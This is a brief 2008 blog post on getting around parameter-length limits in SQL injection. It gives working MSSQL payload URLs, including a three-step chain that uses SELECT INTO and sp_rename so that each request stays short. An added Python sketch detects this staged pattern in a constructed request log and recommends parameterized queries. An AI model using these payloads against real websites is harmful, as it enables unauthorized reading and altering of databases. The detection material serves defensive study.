Input Length Restriction in SQL Injections

July 23, 2008

Often, while exploiting SQL injections, one encounters restrictions on the length of input a vulnerable parameter can take, e.g.:

  • http://myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,@@version-- (works)
  • http://myhost/vuln.asp?vuln=a' union all select 1,2,3,4,5,6,table_name from information_schema.tables-- (may not work: too long)

One solution to this problem is to split the work across several shorter requests:

  • http://myhost/vuln.asp?vuln=a';select * into xx from information_schema.tables--
  • http://myhost/vuln.asp?vuln=a';exec sp_rename 'xx.table_name','xx.tn'--
  • http://myhost/vuln.asp?vuln=a'union all select 1,2,3,4,5,6,tn from xx--

Thanks Ferruh for the help.
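Because every request in the sequence above stays short, a filter that looks only at parameter length will not catch it. The following detection sketch is an added example, not part of the original post: it correlates requests per client and flags a write step followed by a read-back. The log format, IP addresses and function names are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Patterns for the three steps shown in the post (copy, rename, read back).
STAGES = {
    "stage_copy": re.compile(r";\s*select\b.+\binto\b", re.I | re.S),
    "rename":     re.compile(r";\s*exec(ute)?\s+sp_rename\b", re.I),
    "read_back":  re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
}

# Constructed sample log: "<client-ip> <request-target>", not real traffic.
SAMPLE_LOG = """\
10.0.0.5 /vuln.asp?vuln=a%27%3Bselect%20*%20into%20xx%20from%20information_schema.tables--
10.0.0.9 /vuln.asp?vuln=widgets
10.0.0.5 /vuln.asp?vuln=a%27%3Bexec%20sp_rename%20%27xx.table_name%27%2C%27xx.tn%27--
10.0.0.7 /search.asp?q=union%20all%20select%20committee
10.0.0.5 /vuln.asp?vuln=a%27union%20all%20select%201%2C2%2C3%2C4%2C5%2C6%2Ctn%20from%20xx--
"""

def classify(value):
    """Return the set of stage names whose pattern matches one parameter value."""
    return {name for name, rx in STAGES.items() if rx.search(value)}

def correlate(log_text):
    """Map each client to the stages seen across all of its requests."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        client, _, target = line.partition(" ")
        # parse_qsl URL-decodes the values, so %27 and %3B are matched as ' and ;
        for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            seen[client] |= classify(value)
    return dict(seen)

def staged_clients(log_text):
    """Clients that wrote to the database (copy or rename) and also read back."""
    return sorted(c for c, s in correlate(log_text).items()
                  if "read_back" in s and s & {"stage_copy", "rename"})

if __name__ == "__main__":
    for client, stages in correlate(SAMPLE_LOG).items():
        print(client, sorted(stages))
    print("staged injection:", staged_clients(SAMPLE_LOG))
```

Pattern matching of this kind is a detection aid only; the fix for the underlying flaw is a parameterized query, with the web application's database account denied the right to create or rename objects.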
